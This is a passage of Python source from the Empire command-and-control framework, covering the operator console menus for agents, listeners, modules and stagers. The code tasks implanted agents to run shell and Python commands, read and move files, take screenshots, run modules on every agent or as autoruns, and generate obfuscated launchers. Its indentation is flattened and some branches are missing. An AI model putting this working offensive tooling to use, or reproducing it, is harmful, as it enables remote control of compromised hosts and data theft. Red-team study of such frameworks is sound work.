self.mainMenu.agents.set_agent_field_db("jitter", jitter, self.sessionID)
self.mainMenu.agents.add_agent_task_db(self.sessionID, "TASK_CMD_WAIT", "global delay; global jitter; delay=%s; jitter=%s; print 'delay/jitter set to %s/%s'" % (delay, jitter, delay, jitter))
# update the agent log
msg = "Tasked agent to delay sleep/jitter " + str(delay) + "/" + str(jitter)
self.mainMenu.agents.save_agent_log(self.sessionID, msg)
def do_lostlimit(self, line):
"Task an agent to display change the limit on lost agent detection"
parts = line.strip().split(' ')
lostLimit = parts[0]
if lostLimit == "":
# task the agent to display the lostLimit
self.mainMenu.agents.add_agent_task_db(self.sessionID, "TASK_CMD_WAIT", "global lostLimit; print 'lostLimit = ' + str(lostLimit)")
self.mainMenu.agents.save_agent_log(self.sessionID, "Tasked agent to display lost limit")
# update this agent's information in the database
self.mainMenu.agents.set_agent_field_db("lost_limit", lostLimit, self.sessionID)
# task the agent with the new lostLimit
self.mainMenu.agents.add_agent_task_db(self.sessionID, "TASK_CMD_WAIT", "global lostLimit; lostLimit=%s; print 'lostLimit set to %s'"%(lostLimit, lostLimit))
# update the agent log
msg = "Tasked agent to change lost limit " + str(lostLimit)
self.mainMenu.agents.save_agent_log(self.sessionID, msg)
def do_killdate(self, line):
"Get or set an agent's killdate (01/01/2016)."
parts = line.strip().split(' ')
killDate = parts[0]
if killDate == "":
# task the agent to display the killdate
self.mainMenu.agents.add_agent_task_db(self.sessionID, "TASK_CMD_WAIT", "global killDate; print 'killDate = ' + str(killDate)")
self.mainMenu.agents.save_agent_log(self.sessionID, "Tasked agent to display killDate")
# update this agent's information in the database
self.mainMenu.agents.set_agent_field_db("kill_date", killDate, self.sessionID)
# task the agent with the new killDate
self.mainMenu.agents.add_agent_task_db(self.sessionID, "TASK_CMD_WAIT", "global killDate; killDate='%s'; print 'killDate set to %s'" % (killDate, killDate))
# update the agent log
msg = "Tasked agent to set killdate to %s" %(killDate)
self.mainMenu.agents.save_agent_log(self.sessionID, msg)
def do_workinghours(self, line):
"Get or set an agent's working hours (9:00-17:00)."
parts = line.strip().split(' ')
hours = parts[0]
if hours == "":
self.mainMenu.agents.add_agent_task_db(self.sessionID, "TASK_CMD_WAIT", "global workingHours; print 'workingHours = ' + str(workingHours)")
self.mainMenu.agents.save_agent_log(self.sessionID, "Tasked agent to get working hours")
# update this agent's information in the database
self.mainMenu.agents.set_agent_field_db("working_hours", hours, self.sessionID)
# task the agent with the new working hours
self.mainMenu.agents.add_agent_task_db(self.sessionID, "TASK_CMD_WAIT", "global workingHours; workingHours= '%s'"%(hours))
# update the agent log
msg = "Tasked agent to set working hours to: %s" % (hours)
self.mainMenu.agents.save_agent_log(self.sessionID, msg)
def do_shell(self, line):
"Task an agent to use a shell command."
line = line.strip()
if line != "":
# task the agent with this shell command
self.mainMenu.agents.add_agent_task_db(self.sessionID, "TASK_SHELL", str(line))
# update the agent log
msg = "Tasked agent to run shell command: %s" % (line)
self.mainMenu.agents.save_agent_log(self.sessionID, msg)
def do_python(self, line):
"Task an agent to run a Python command."
line = line.strip()
if line != "":
# task the agent with this shell command
self.mainMenu.agents.add_agent_task_db(self.sessionID, "TASK_CMD_WAIT", str(line))
# update the agent log
msg = "Tasked agent to run Python command %s" % (line)
self.mainMenu.agents.save_agent_log(self.sessionID, msg)
def do_pythonscript(self, line):
"Load and execute a python script"
path = line.strip()
if os.path.splitext(path)[-1] == '.py' and os.path.isfile(path):
filename = os.path.basename(path).rstrip('.py')
open_file = open(path, 'r')
script = open_file.read()
script = script.replace('\r\n', '\n')
script = script.replace('\r', '\n')
encScript = base64.b64encode(script)
msg = "[*] Tasked agent to execute python script: "+filename
print helpers.color(msg, color="green")
self.mainMenu.agents.add_agent_task_db(self.sessionID, "TASK_SCRIPT_COMMAND", encScript)
#update the agent log
self.mainMenu.agents.save_agent_log(self.sessionID, msg)
print helpers.color("[!] Please provide a valid path", color="red")
def do_sysinfo(self, line):
"Task an agent to get system information."
# task the agent with this shell command
self.mainMenu.agents.add_agent_task_db(self.sessionID, "TASK_SYSINFO")
# update the agent log
self.mainMenu.agents.save_agent_log(self.sessionID, "Tasked agent to get system information")
def do_download(self, line):
"Task an agent to download a file."
line = line.strip()
if line != "":
self.mainMenu.agents.add_agent_task_db(self.sessionID, "TASK_DOWNLOAD", line)
# update the agent log
msg = "Tasked agent to download: %s" % (line)
self.mainMenu.agents.save_agent_log(self.sessionID, msg)
def do_upload(self, line):
"Task an agent to upload a file."
# "upload /path/file.ext" or "upload /path/file/file.ext newfile.ext"
# absolute paths accepted
parts = line.strip().split(' ')
uploadname = ""
if len(parts) > 0 and parts[0] != "":
if len(parts) == 1:
# if we're uploading the file with its original name
uploadname = os.path.basename(parts[0])
# if we're uploading the file as a different name
uploadname = parts[1].strip()
if parts[0] != "" and os.path.exists(parts[0]):
# TODO: reimplement Python file upload
# # read in the file and base64 encode it for transport
f = open(parts[0], 'r')
fileData = f.read()
# Get file size
size = os.path.getsize(parts[0])
if size > 1048576:
print helpers.color("[!] File size is too large. Upload limit is 1MB.")
print helpers.color("[*] Starting size of %s for upload: %s" %(uploadname, helpers.get_file_size(fileData)), color="green")
msg = "Tasked agent to upload " + parts[0] + " : " + hashlib.md5(fileData).hexdigest()
# update the agent log with the filename and MD5
self.mainMenu.agents.save_agent_log(self.sessionID, msg)
# compress data before we base64
c = compress.compress()
start_crc32 = c.crc32_data(fileData)
comp_data = c.comp_data(fileData, 9)
fileData = c.build_header(comp_data, start_crc32)
# get final file size
print helpers.color("[*] Final tasked size of %s for upload: %s" %(uploadname, helpers.get_file_size(fileData)), color="green")
fileData = helpers.encode_base64(fileData)
# upload packets -> "filename | script data"
data = uploadname + "|" + fileData
self.mainMenu.agents.add_agent_task_db(self.sessionID, "TASK_UPLOAD", data)
print helpers.color("[!] Please enter a valid file path to upload")
def do_usemodule(self, line):
"Use an Empire Python module."
# Strip asterisks added by MainMenu.complete_usemodule()
module = "python/%s" %(line.strip().rstrip("*"))
if module not in self.mainMenu.modules.modules:
print helpers.color("[!] Error: invalid module")
module_menu = ModuleMenu(self.mainMenu, module, agent=self.sessionID)
def do_searchmodule(self, line):
"Search Empire module names/descriptions."
searchTerm = line.strip()
if searchTerm.strip() == "":
print helpers.color("[!] Please enter a search term.")
def do_sc(self, line):
"Use the python-mss module to take a screenshot, and save the image to the server. Not opsec safe"
if self.mainMenu.modules.modules['python/collection/osx/native_screenshot']:
module = self.mainMenu.modules.modules['python/collection/osx/native_screenshot']
module.options['Agent']['Value'] = self.mainMenu.agents.get_agent_name_db(self.sessionID)
#execute screenshot module
msg = "[*] Tasked agent to take a screenshot"
module_menu = ModuleMenu(self.mainMenu, 'python/collection/osx/native_screenshot')
print helpers.color(msg, color="green")
self.mainMenu.agents.save_agent_log(self.sessionID, msg)
print helpers.color("[!] python/collection/osx/screenshot module not loaded")
def do_ls_m(self, line):
"List directory contents at the specified path"
if self.mainMenu.modules.modules['python/management/osx/ls_m']:
module = self.mainMenu.modules.modules['python/management/osx/ls_m']
if line.strip() != '':
module.options['Path']['Value'] = line.strip()
module.options['Agent']['Value'] = self.mainMenu.agents.get_agent_name_db(self.sessionID)
module_menu = ModuleMenu(self.mainMenu, 'python/management/osx/ls_m')
msg = "[*] Tasked agent to list directory contents of: "+str(module.options['Path']['Value'])
print helpers.color(msg,color="green")
self.mainMenu.agents.save_agent_log(self.sessionID, msg)
print helpers.color("[!] python/management/osx/ls_m module not loaded")
def do_cat(self, line):
"View the contents of a file"
if line != "":
cmd = """
output = ""
with open("%s","r") as f:
for line in f:
output += line
print output
except Exception as e:
print str(e)
""" % (line)
# task the agent with this shell command
self.mainMenu.agents.add_agent_task_db(self.sessionID, "TASK_CMD_WAIT", str(cmd))
# update the agent log
msg = "Tasked agent to cat file %s" % (line)
self.mainMenu.agents.save_agent_log(self.sessionID, msg)
def do_pwd(self, line):
"Print working directory"
command = "cwd = os.getcwd(); print cwd"
self.mainMenu.agents.add_agent_task_db(self.sessionID, "TASK_CMD_WAIT", command)
msg = "Tasked agent to print current working directory"
self.mainMenu.agents.save_agent_log(self.sessionID, msg)
def do_whoami(self, line):
"Print the currently logged in user"
command = "from AppKit import NSUserName; print str(NSUserName())"
self.mainMenu.agents.add_agent_task_db(self.sessionID, "TASK_CMD_WAIT", command)
msg = "Tasked agent to print currently logged on user"
self.mainMenu.agents.save_agent_log(self.sessionID, msg)
def do_loadpymodule(self, line):
"Import zip file containing a .py module or package with an __init__.py"
path = line.strip()
#check the file ext and confirm that the path given is a file
if os.path.splitext(path)[-1] == '.zip' and os.path.isfile(path):
#open a handle to the file and save the data to a variable, zlib compress
filename = os.path.basename(path).rstrip('.zip')
open_file = open(path, 'rb')
module_data = open_file.read()
msg = "Tasked agent to import "+path+" : "+hashlib.md5(module_data).hexdigest()
print helpers.color("[*] "+msg, color="green")
self.mainMenu.agents.save_agent_log(self.sessionID, msg)
c = compress.compress()
start_crc32 = c.crc32_data(module_data)
comp_data = c.comp_data(module_data, 9)
module_data = c.build_header(comp_data, start_crc32)
module_data = helpers.encode_base64(module_data)
data = filename + '|' + module_data
self.mainMenu.agents.add_agent_task_db(self.sessionID, "TASK_IMPORT_MODULE", data)
print helpers.color("[!] Please provide a valid zipfile path", color="red")
def do_shellb(self, line):
"""Execute a shell command as a background job"""
cmd = line.strip()
if self.mainMenu.modules.modules['python/management/osx/shellb']:
module = self.mainMenu.modules.modules['python/management/osx/shellb']
if line.strip() != '':
module.options['Command']['Value'] = line.strip()
module.options['Agent']['Value'] = self.mainMenu.agents.get_agent_name_db(self.sessionID)
module_menu = ModuleMenu(self.mainMenu, 'python/management/osx/shellb')
msg = "[*] Tasked agent to execute %s in the background" % (str(module.options['Path']['Value']))
print helpers.color(msg,color="green")
self.mainMenu.agents.save_agent_log(self.sessionID, msg)
print helpers.color("[!] python/management/osx/shellb module not loaded")
def do_viewrepo(self, line):
"View the contents of a repo. if none is specified, all files will be returned"
repoName = line.strip()
msg = "[*] Tasked agent to view repo contents: " + repoName
print helpers.color(msg, color="green")
self.mainMenu.agents.save_agent_log(self.sessionID, msg)
self.mainMenu.agents.add_agent_task_db(self.sessionID, "TASK_VIEW_MODULE", repoName)
def do_removerepo(self, line):
"Remove a repo"
repoName = line.strip()
msg = "[*] Tasked agent to remove repo: "+repoName
print helpers.color(msg, color="green")
self.mainMenu.agents.save_agent_log(self.sessionID, msg)
self.mainMenu.agents.add_agent_task_db(self.sessionID, "TASK_REMOVE_MODULE", repoName)
def do_creds(self, line):
"Display/return credentials from the database."
def complete_loadpymodule(self, text, line, begidx, endidx):
"Tab-complete a zip file path"
return helpers.complete_path(text, line)
def complete_pythonscript(self, text, line, begidx, endidx):
"Tab-complete a zip file path"
return helpers.complete_path(text, line)
def complete_usemodule(self, text, line, begidx, endidx):
"Tab-complete an Empire Python module path"
return self.mainMenu.complete_usemodule(text, line, begidx, endidx, language='python')
def complete_upload(self, text, line, begidx, endidx):
"Tab-complete an upload file path"
return helpers.complete_path(text, line)
# def complete_updateprofile(self, text, line, begidx, endidx):
# "Tab-complete an updateprofile path"
# return helpers.complete_path(text,line)
class ListenersMenu(SubMenu):
The main class used by Empire to drive the 'listener' menu.
def __init__(self, mainMenu):
SubMenu.__init__(self, mainMenu)
self.doc_header = 'Listener Commands'
# set the prompt text
self.prompt = '(Empire: ' + helpers.color('listeners', color='blue') + ') > '
# display all active listeners on menu startup
def do_back(self, line):
"Go back to the main menu."
raise NavMain()
def do_list(self, line):
"List all active listeners (or agents)."
if line.lower().startswith('agents'):
self.mainMenu.do_list('agents ' + str(' '.join(line.split(' ')[1:])))
elif line.lower().startswith("listeners"):
self.mainMenu.do_list('listeners ' + str(' '.join(line.split(' ')[1:])))
self.mainMenu.do_list('listeners ' + str(line))
def do_kill(self, line):
"Kill one or all active listeners."
listenerID = line.strip()
if listenerID.lower() == 'all':
choice = raw_input(helpers.color('[>] Kill all listeners? [y/N] ', 'red'))
if choice.lower() != '' and choice.lower()[0] == 'y':
except KeyboardInterrupt:
print ''
def do_usestager(self, line):
"Use an Empire stager."
parts = line.split(' ')
if parts[0] not in self.mainMenu.stagers.stagers:
print helpers.color("[!] Error: invalid stager module")
elif len(parts) == 1:
stager_menu = StagerMenu(self.mainMenu, parts[0])
elif len(parts) == 2:
listener = parts[1]
if not self.mainMenu.listeners.is_listener_valid(listener):
print helpers.color("[!] Please enter a valid listener name or ID")
self.mainMenu.stagers.set_stager_option('Listener', listener)
stager_menu = StagerMenu(self.mainMenu, parts[0])
print helpers.color("[!] Error in ListenerMenu's do_userstager()")
def do_uselistener(self, line):
"Use an Empire listener module."
parts = line.split(' ')
if parts[0] not in self.mainMenu.listeners.loadedListeners:
print helpers.color("[!] Error: invalid listener module")
listenerMenu = ListenerMenu(self.mainMenu, parts[0])
def do_info(self, line):
"Display information for the given active listener."
listenerName = line.strip()
if listenerName not in self.mainMenu.listeners.activeListeners:
print helpers.color("[!] Invalid listener name")
def do_launcher(self, line):
"Generate an initial launcher for a listener."
parts = line.strip().split()
if len(parts) != 2:
print helpers.color("[!] Please enter 'launcher <language> <listenerName>'")
language = parts[0].lower()
listenerName = self.mainMenu.listeners.get_listener_name(parts[1])
if listenerName:
# set the listener value for the launcher
stager = self.mainMenu.stagers.stagers['multi/launcher']
stager.options['Listener']['Value'] = listenerName
stager.options['Language']['Value'] = language
stager.options['Base64']['Value'] = "True"
if self.mainMenu.obfuscate:
stager.options['Obfuscate']['Value'] = "True"
stager.options['Obfuscate']['Value'] = "False"
print stager.generate()
except Exception as e:
print helpers.color("[!] Error generating launcher: %s" % (e))
print helpers.color("[!] Please enter a valid listenerName")
def complete_usestager(self, text, line, begidx, endidx):
"Tab-complete an Empire stager module path."
return self.mainMenu.complete_usestager(text, line, begidx, endidx)
def complete_kill(self, text, line, begidx, endidx):
"Tab-complete listener names"
# get all the listener names
names = self.mainMenu.listeners.activeListeners.keys() + ["all"]
mline = line.partition(' ')[2]
offs = len(mline) - len(text)
return [s[offs:] for s in names if s.startswith(mline)]
def complete_launcher(self, text, line, begidx, endidx):
"Tab-complete language types and listener names/IDs"
languages = ['powershell', 'python']
if line.split(' ')[1].lower() in languages:
# if we already have a language name, tab-complete listener names
listenerNames = self.mainMenu.listeners.get_listener_names()
end_line = ' '.join(line.split(' ')[1:])
mline = end_line.partition(' ')[2]
offs = len(mline) - len(text)
return [s[offs:] for s in listenerNames if s.startswith(mline)]
# otherwise tab-complate the stager names
mline = line.partition(' ')[2]
offs = len(mline) - len(text)
return [s[offs:] for s in languages if s.startswith(mline)]
def complete_info(self, text, line, begidx, endidx):
"Tab-complete listener names/IDs"
# get all the listener names
names = self.mainMenu.listeners.activeListeners.keys()
mline = line.partition(' ')[2]
offs = len(mline) - len(text)
return [s[offs:] for s in names if s.startswith(mline)]
def complete_uselistener(self, text, line, begidx, endidx):
"Tab-complete an uselistener command"
names = self.mainMenu.listeners.loadedListeners.keys()
mline = line.partition(' ')[2]
offs = len(mline) - len(text)
return [s[offs:] for s in names if s.startswith(mline)]
class ListenerMenu(SubMenu):
def __init__(self, mainMenu, listenerName):
SubMenu.__init__(self, mainMenu)
if listenerName not in self.mainMenu.listeners.loadedListeners:
print helpers.color("[!] Listener '%s' not currently valid!" % (listenerName))
raise NavListeners()
self.doc_header = 'Listener Commands'
self.listener = self.mainMenu.listeners.loadedListeners[listenerName]
self.listenerName = listenerName
# set the text prompt
self.prompt = '(Empire: ' + helpers.color("listeners/%s" % (listenerName), 'red') + ') > '
def do_info(self, line):
"Display listener module options."
def do_execute(self, line):
"Execute the given listener module."
self.mainMenu.listeners.start_listener(self.listenerName, self.listener)
def do_launcher(self, line):
"Generate an initial launcher for this listener."
self.listenerName = self.listener.options['Name']['Value']
parts = line.strip().split()
if len(parts) != 1:
print helpers.color("[!] Please enter 'launcher <language>'")
# set the listener value for the launcher
stager = self.mainMenu.stagers.stagers['multi/launcher']
stager.options['Listener']['Value'] = self.listenerName
stager.options['Language']['Value'] = parts[0]
stager.options['Base64']['Value'] = "True"
print stager.generate()
except Exception as e:
print helpers.color("[!] Error generating launcher: %s" % (e))
def do_set(self, line):
"Set a listener option."
parts = line.split()
option = parts[0]
if option not in self.listener.options:
print helpers.color("[!] Invalid option specified.")
elif len(parts) == 1:
# "set OPTION"
# check if we're setting a switch
if self.listener.options[option]['Description'].startswith("Switch."):
self.listener.options[option]['Value'] = "True"
print helpers.color("[!] Please specify an option value.")
# otherwise "set OPTION VALUE"
option = parts[0]
value = ' '.join(parts[1:])
if value == '""' or value == "''":
value = ""
self.mainMenu.listeners.set_listener_option(self.listenerName, option, value)
except Exception as e:
print helpers.color("[!] Error in setting listener option: %s" % (e))
def do_unset(self, line):
"Unset a listener option."
option = line.split()[0]
if line.lower() == "all":
for option in self.listener.options:
self.listener.options[option]['Value'] = ''
if option not in self.listener.options:
print helpers.color("[!] Invalid option specified.")
self.listener.options[option]['Value'] = ''
def complete_set(self, text, line, begidx, endidx):
"Tab-complete a listener option to set."
options = self.listener.options.keys()
if line.split(' ')[1].lower().endswith('path'):
return helpers.complete_path(text, line, arg=True)
elif line.split(' ')[1].lower().endswith('file'):
return helpers.complete_path(text, line, arg=True)
elif line.split(' ')[1].lower().endswith('host'):
return [helpers.lhost()]
elif line.split(' ')[1].lower().endswith('listener'):
listenerNames = self.mainMenu.listeners.get_listener_names()
end_line = ' '.join(line.split(' ')[1:])
mline = end_line.partition(' ')[2]
offs = len(mline) - len(text)
return [s[offs:] for s in listenerNames if s.startswith(mline)]
# otherwise we're tab-completing an option name
mline = line.partition(' ')[2]
offs = len(mline) - len(text)
return [s[offs:] for s in options if s.startswith(mline)]
def complete_unset(self, text, line, begidx, endidx):
"Tab-complete a module option to unset."
options = self.listener.options.keys()
mline = line.partition(' ')[2]
offs = len(mline) - len(text)
return [s[offs:] for s in options if s.startswith(mline)]
def complete_launcher(self, text, line, begidx, endidx):
"Tab-complete language types"
languages = ['powershell', 'python']
mline = line.partition(' ')[2]
offs = len(mline) - len(text)
return [s[offs:] for s in languages if s.startswith(mline)]
class ModuleMenu(SubMenu):
The main class used by Empire to drive the 'module' menu.
def __init__(self, mainMenu, moduleName, agent=None):
SubMenu.__init__(self, mainMenu)
self.doc_header = 'Module Commands'
# get the current module/name
self.moduleName = moduleName
self.module = self.mainMenu.modules.modules[moduleName]
# set the prompt text
self.prompt = '(Empire: ' + helpers.color(self.moduleName, color="blue") + ') > '
# if this menu is being called from an agent menu
if agent and 'Agent' in self.module.options:
# resolve the agent sessionID to a name, if applicable
agent = self.mainMenu.agents.get_agent_name_db(agent)
self.module.options['Agent']['Value'] = agent
except Exception as e:
print helpers.color("[!] ModuleMenu() init error: %s" % (e))
def validate_options(self, prompt):
"Ensure all required module options are completed."
# ensure all 'Required=True' options are filled in
for option, values in self.module.options.iteritems():
if values['Required'] and ((not values['Value']) or (values['Value'] == '')):
print helpers.color("[!] Error: Required module option missing.")
return False
# 'Agent' is set for all but external/* modules
if 'Agent' in self.module.options:
sessionID = self.module.options['Agent']['Value']
# if we're running this module for all agents, skip this validation
if sessionID.lower() != "all" and sessionID.lower() != "autorun":
moduleLangVersion = float(self.module.info['MinLanguageVersion'])
agentLangVersion = float(self.mainMenu.agents.get_language_version_db(sessionID))
# check if the agent/module PowerShell versions are compatible
if moduleLangVersion > agentLangVersion:
print helpers.color("[!] Error: module requires language version %s but agent running version %s" % (moduleLangVersion, agentPSVersion))
return False
except Exception as e:
print helpers.color("[!] Invalid module or agent language version: %s" % (e))
return False
# check if the module needs admin privs
if self.module.info['NeedsAdmin']:
# if we're running this module for all agents, skip this validation
if sessionID.lower() != "all" and sessionID.lower() != "autorun":
if not self.mainMenu.agents.is_agent_elevated(sessionID):
print helpers.color("[!] Error: module needs to run in an elevated context.")
return False
# if the module isn't opsec safe, prompt before running (unless "execute noprompt" was issued)
if prompt and ('OpsecSafe' in self.module.info) and (not self.module.info['OpsecSafe']):
choice = raw_input(helpers.color("[>] Module is not opsec safe, run? [y/N] ", "red"))
if not (choice.lower() != "" and choice.lower()[0] == "y"):
return False
except KeyboardInterrupt:
print ""
return False
return True
def do_list(self, line):
"Lists all active agents (or listeners)."
if line.lower().startswith("listeners"):
self.mainMenu.do_list("listeners " + str(' '.join(line.split(' ')[1:])))
elif line.lower().startswith("agents"):
self.mainMenu.do_list("agents " + str(' '.join(line.split(' ')[1:])))
print helpers.color("[!] Please use 'list [agents/listeners] <modifier>'.")
def do_reload(self, line):
"Reload the current module."
print "\n" + helpers.color("[*] Reloading module") + "\n"
# reload the specific module
# regrab the reference
self.module = self.mainMenu.modules.modules[self.moduleName]
def do_info(self, line):
"Display module options."
messages.display_module(self.moduleName, self.module)
def do_options(self, line):
"Display module options."
messages.display_module(self.moduleName, self.module)
def do_set(self, line):
"Set a module option."
parts = line.split()
option = parts[0]
if option not in self.module.options:
print helpers.color("[!] Invalid option specified.")
elif len(parts) == 1:
# "set OPTION"
# check if we're setting a switch
if self.module.options[option]['Description'].startswith("Switch."):
self.module.options[option]['Value'] = "True"
print helpers.color("[!] Please specify an option value.")
# otherwise "set OPTION VALUE"
option = parts[0]
value = ' '.join(parts[1:])
if value == '""' or value == "''":
value = ""
self.module.options[option]['Value'] = value
print helpers.color("[!] Error in setting option, likely invalid option name.")
def do_unset(self, line):
"Unset a module option."
option = line.split()[0]
if line.lower() == "all":
for option in self.module.options:
self.module.options[option]['Value'] = ''
if option not in self.module.options:
print helpers.color("[!] Invalid option specified.")
self.module.options[option]['Value'] = ''
def do_usemodule(self, line):
"Use an Empire PowerShell module."
# Strip asterisks added by MainMenu.complete_usemodule()
module = line.strip().rstrip("*")
if module not in self.mainMenu.modules.modules:
print helpers.color("[!] Error: invalid module")
_agent = ''
if 'Agent' in self.module.options:
_agent = self.module.options['Agent']['Value']
line = line.strip("*")
module_menu = ModuleMenu(self.mainMenu, line, agent=_agent)
def do_creds(self, line):
"Display/return credentials from the database."
def do_execute(self, line):
"Execute the given Empire module."
prompt = True
if line == "noprompt":
prompt = False
if not self.validate_options(prompt):
if self.moduleName.lower().startswith('external/'):
# externa/* modules don't include an agent specification, and only have
# an execute() method'
agentName = self.module.options['Agent']['Value']
moduleData = self.module.generate(self.mainMenu.obfuscate, self.mainMenu.obfuscateCommand)
if not moduleData or moduleData == "":
print helpers.color("[!] Error: module produced an empty script")
dispatcher.send("[!] Error: module produced an empty script", sender="Empire")
except UnicodeDecodeError:
print helpers.color("[!] Error: module source contains non-ascii characters")
# strip all comments from the module
moduleData = helpers.strip_powershell_comments(moduleData)
taskCommand = ""
# build the appropriate task command and module data blob
if str(self.module.info['Background']).lower() == "true":
# if this module should be run in the background
extention = self.module.info['OutputExtension']
if extention and extention != "":
# if this module needs to save its file output to the server
# format- [15 chars of prefix][5 chars extension][data]
saveFilePrefix = self.moduleName.split("/")[-1]
moduleData = saveFilePrefix.rjust(15) + extention.rjust(5) + moduleData
taskCommand = "TASK_CMD_JOB_SAVE"
taskCommand = "TASK_CMD_JOB"
# if this module is run in the foreground
extention = self.module.info['OutputExtension']
if self.module.info['OutputExtension'] and self.module.info['OutputExtension'] != "":
# if this module needs to save its file output to the server
# format- [15 chars of prefix][5 chars extension][data]
saveFilePrefix = self.moduleName.split("/")[-1][:15]
moduleData = saveFilePrefix.rjust(15) + extention.rjust(5) + moduleData
taskCommand = "TASK_CMD_WAIT_SAVE"
taskCommand = "TASK_CMD_WAIT"
# if we're running the module on all modules
if agentName.lower() == "all":
choice = raw_input(helpers.color("[>] Run module on all agents? [y/N] ", "red"))
if choice.lower() != "" and choice.lower()[0] == "y":
# signal everyone with what we're doing
print helpers.color("[*] Tasking all agents to run " + self.moduleName)
dispatcher.send("[*] Tasking all agents to run " + self.moduleName, sender="Empire")
# actually task the agents
for agent in self.mainMenu.agents.get_agents_db():
sessionID = agent['session_id']
# set the agent's tasking in the cache
self.mainMenu.agents.add_agent_task_db(sessionID, taskCommand, moduleData)
# update the agent log
# dispatcher.send("[*] Tasked agent "+sessionID+" to run module " + self.moduleName, sender="Empire")
dispatcher.send("[*] Tasked agent %s to run module %s" % (sessionID, self.moduleName), sender="Empire")
msg = "Tasked agent to run module %s" % (self.moduleName)
self.mainMenu.agents.save_agent_log(sessionID, msg)
except KeyboardInterrupt:
print ""
# set the script to be the global autorun
elif agentName.lower() == "autorun":
self.mainMenu.agents.set_autoruns_db(taskCommand, moduleData)
dispatcher.send("[*] Set module %s to be global script autorun." % (self.moduleName), sender="Empire")
if not self.mainMenu.agents.is_agent_present(agentName):
print helpers.color("[!] Invalid agent name.")
# set the agent's tasking in the cache
self.mainMenu.agents.add_agent_task_db(agentName, taskCommand, moduleData)
# update the agent log
dispatcher.send("[*] Tasked agent %s to run module %s" % (agentName, self.moduleName), sender="Empire")
msg = "Tasked agent to run module %s" % (self.moduleName)
self.mainMenu.agents.save_agent_log(agentName, msg)
def do_run(self, line):
"Execute the given Empire module."
def do_interact(self, line):
"Interact with a particular agent."
name = line.strip()
if name != "" and self.mainMenu.agents.is_agent_present(name):
# resolve the passed name to a sessionID
sessionID = self.mainMenu.agents.get_agent_id_db(name)
agent_menu = AgentMenu(self.mainMenu, sessionID)
print helpers.color("[!] Please enter a valid agent name")
def complete_set(self, text, line, begidx, endidx):
"Tab-complete a module option to set."
options = self.module.options.keys()
if line.split(' ')[1].lower() == "agent":
# if we're tab-completing "agent", return the agent names
agentNames = self.mainMenu.agents.get_agent_names_db() + ["all", "autorun"]
end_line = ' '.join(line.split(' ')[1:])
mline = end_line.partition(' ')[2]
offs = len(mline) - len(text)
return [s[offs:] for s in agentNames if s.startswith(mline)]
elif line.split(' ')[1].lower() == "listener":
# if we're tab-completing a listener name, return all the names
listenerNames = self.mainMenu.listeners.get_listener_names()
end_line = ' '.join(line.split(' ')[1:])
mline = end_line.partition(' ')[2]
offs = len(mline) - len(text)
return [s[offs:] for s in listenerNames if s.startswith(mline)]
elif line.split(' ')[1].lower().endswith("path"):
return helpers.complete_path(text, line, arg=True)
elif line.split(' ')[1].lower().endswith("file"):
return helpers.complete_path(text, line, arg=True)
elif line.split(' ')[1].lower().endswith("host"):
return [helpers.lhost()]
elif line.split(' ')[1].lower().endswith("language"):
languages = ['powershell', 'python']
end_line = ' '.join(line.split(' ')[1:])
mline = end_line.partition(' ')[2]
offs = len(mline) - len(text)
return [s[offs:] for s in languages if s.startswith(mline)]
# otherwise we're tab-completing an option name
mline = line.partition(' ')[2]
offs = len(mline) - len(text)
return [s[offs:] for s in options if s.startswith(mline)]
def complete_unset(self, text, line, begidx, endidx):
"Tab-complete a module option to unset."
options = self.module.options.keys() + ["all"]
mline = line.partition(' ')[2]
offs = len(mline) - len(text)
return [s[offs:] for s in options if s.startswith(mline)]
def complete_usemodule(self, text, line, begidx, endidx):
"Tab-complete an Empire PowerShell module path."
return self.mainMenu.complete_usemodule(text, line, begidx, endidx)
def complete_creds(self, text, line, begidx, endidx):
"Tab-complete 'creds' commands."
return self.mainMenu.complete_creds(text, line, begidx, endidx)
def complete_interact(self, text, line, begidx, endidx):
"Tab-complete an interact command"
names = self.mainMenu.agents.get_agent_names_db()
mline = line.partition(' ')[2]
offs = len(mline) - len(text)
return [s[offs:] for s in names if s.startswith(mline)]
class StagerMenu(SubMenu):
The main class used by Empire to drive the 'stager' menu.
def __init__(self, mainMenu, stagerName, listener=None):
SubMenu.__init__(self, mainMenu)
self.doc_header = 'Stager Menu'
# get the current stager name
self.stagerName = stagerName
self.stager = self.mainMenu.stagers.stagers[stagerName]
# set the prompt text
self.prompt = '(Empire: ' + helpers.color("stager/" + self.stagerName, color="blue") + ') > '
# if this menu is being called from an listener menu
if listener:
# resolve the listener ID to a name, if applicable
listener = self.mainMenu.listeners.get_listener(listener)
self.stager.options['Listener']['Value'] = listener
def validate_options(self):
"Make sure all required stager options are completed."
for option, values in self.stager.options.iteritems():
if values['Required'] and ((not values['Value']) or (values['Value'] == '')):
print helpers.color("[!] Error: Required stager option missing.")
return False
listenerName = self.stager.options['Listener']['Value']
if not self.mainMenu.listeners.is_listener_valid(listenerName):
print helpers.color("[!] Invalid listener ID or name.")
return False
return True
def do_list(self, line):
"Lists all active agents (or listeners)."
if line.lower().startswith("listeners"):
self.mainMenu.do_list("listeners " + str(' '.join(line.split(' ')[1:])))
elif line.lower().startswith("agents"):
self.mainMenu.do_list("agents " + str(' '.join(line.split(' ')[1:])))
print helpers.color("[!] Please use 'list [agents/listeners] <modifier>'.")
def do_info(self, line):
"Display stager options."
def do_options(self, line):
"Display stager options."
def do_set(self, line):
"Set a stager option."
parts = line.split()
option = parts[0]
if option not in self.stager.options:
print helpers.color("[!] Invalid option specified.")
elif len(parts) == 1:
# "set OPTION"
# check if we're setting a switch
if self.stager.options[option]['Description'].startswith("Switch."):
self.stager.options[option]['Value'] = "True"
print helpers.color("[!] Please specify an option value.")
# otherwise "set OPTION VALUE"
option = parts[0]
value = ' '.join(parts[1:])
if value == '""' or value == "''":
value = ""
self.stager.options[option]['Value'] = value
print helpers.color("[!] Error in setting option, likely invalid option name.")
def do_unset(self, line):
"Unset a stager option."
option = line.split()[0]
if line.lower() == "all":
for option in self.stager.options:
self.stager.options[option]['Value'] = ''
if option not in self.stager.options:
print helpers.color("[!] Invalid option specified.")
self.stager.options[option]['Value'] = ''
def do_generate(self, line):
"Generate/execute the given Empire stager."
if not self.validate_options():
stagerOutput = self.stager.generate()
savePath = ''
if 'OutFile' in self.stager.options:
savePath = self.stager.options['OutFile']['Value']
if savePath != '':
# make the base directory if it doesn't exist
if not os.path.exists(os.path.dirname(savePath)) and os.path.dirname(savePath) != '':
# if we need to write binary output for a .dll
if ".dll" in savePath:
out_file = open(savePath, 'wb')
# otherwise normal output
out_file = open(savePath, 'w')
